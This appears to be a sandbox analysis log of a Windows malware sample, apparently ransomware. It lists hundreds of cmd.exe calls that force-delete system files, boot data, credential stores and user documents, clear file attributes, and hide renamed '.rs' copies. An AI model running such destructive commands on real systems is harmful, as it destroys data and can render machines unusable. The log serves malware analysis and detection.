C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\wab32.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\wab32.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\msadc\adcjavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\msadc\adcjavas.inc""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files (x86)\Common Files\System\msadc\adcjavas.inc"4⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Boot\BCD""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\BCD""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\93c59f00b8944be7b164f8214fb84068\Microsoft.PowerShell.Utility.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\a3dac3c7d2e408eea4549415260515f0\Microsoft.PowerShell.Core.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini"4⤵
- Drops desktop.ini file(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\$Recycle.Bin\S-1-5-18\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\edb.jcp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\20e8e64282b64866288c5abe3726505d\Microsoft.ManagementConsole.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\System.Data.OracleClient.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\ab152a3cf67c37ea0803476cd27b387c\Microsoft.Management.Infrastructure.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Conversion.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Conversion.v3.5.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\945c6be7dbbadeeaf168e04a2bd532e8\Microsoft.Dtc.PowerShell.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\AppxProvisioning.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.2.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\IIEHost\2.0.0.0__b03f5f7f11d50a3a\IIEHost.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\srmlib.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Network\Downloader\edb.chk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\IEExecRemote\2.0.0.0__b03f5f7f11d50a3a\IEExecRemote.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Office\ClickToRunPackageLocker""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\dfsvc\2.0.0.0__b03f5f7f11d50a3a\dfsvc.exe""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools.lnk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Windows Terminal.lnk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\8db8d076664a501529efa53676fffe19\Microsoft.ApplicationId.Framework.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\srmlib\1.0.0.0__31bf3856ad364e35\srmlib.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\Diagtrack-Listener.etl.003""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\328247cfb9c64f4858ac1c42b1cb0a69\EventViewer.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\1e7007bb925405b745cc0c9664e56d23\Microsoft.ApplicationId.RuleWizard.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\User Account Pictures\Admin.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\cscompmgd\8.0.0.0__b03f5f7f11d50a3a\cscompmgd.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\19ff937c54753aacc753dc50e622e8e2\CustomMarshalers.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\ComSvcConfig\3.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Accessibility\2.0.0.0__b03f5f7f11d50a3a\Accessibility.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\IdentityCRL\production\wlidsvcconfig.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\MF\Active.GRL""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\2db6ff51f6f4c33d79910f94be2e6463\EventViewer.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\f665a797f8bc31f05d7fa16e1d55f7cb\AuditPolicyGPManagedStubs.Interop.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\01a49b58e7b507b9b36a41c77b70e954\AuditPolicyGPManagedStubs.Interop.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\IdentityCRL\INT\wlidsvcconfig.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\USOShared\Logs\User\MoNotificationUx.06d3f06f-f5e6-4d29-b37f-20a5b6d070ad.1.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\EventStore.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jcp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fe7296d67c4a4d28560802becdf22ba6\Accessibility.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\CREDHIST""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\CREDHIST.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\CREDHIST""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\msdatasrc.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\NTUSER.DAT""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\mscomctl\10.0.4504.0__31bf3856ad364e35\MSCOMCTL.DLL""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_Autopilot_2021_7_22_3_11_17.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TM.blf""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TM.blf.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35\Microsoft.Interop.Security.AzRoles.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TM.blf""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\MMC\services""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Extensibility\7.0.3300.0__b03f5f7f11d50a3a\extensibility.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Crypto\SystemKeys\e20a5d00f699f8b0d3cc797944b4c0cf_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\PublisherPolicy.tme""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\assembly\PublisherPolicy.tme.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Music\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Music\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Windows\assembly\PublisherPolicy.tme""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\AggregatorStorage\FailoverSignalAggregator$""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Music\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\adodb.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Network\Downloader\edb.chk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Links\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Links\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Links\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Favorites\Bing.url""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\PipelineSegments.store""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Downloads\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Downloads\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\D3DSCache\45a5e5b635b28e7a\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Office\ClickToRunPackageLocker""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Downloads\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\IconCache.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Local\IconCache.db.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\DeploymentConfig.0.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\AppData\Local\IconCache.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Documents\Are.docx""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Comms\Unistore\data\AggregateCache.uca""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\USOShared\Logs\User\MoNotificationUx.06d3f06f-f5e6-4d29-b37f-20a5b6d070ad.1.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft OneDrive\setup\refcount.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\bfsvc.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\IdentityCRL\production\wlidsvcconfig.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Desktop\desktop.ini.rs""3⤵
-
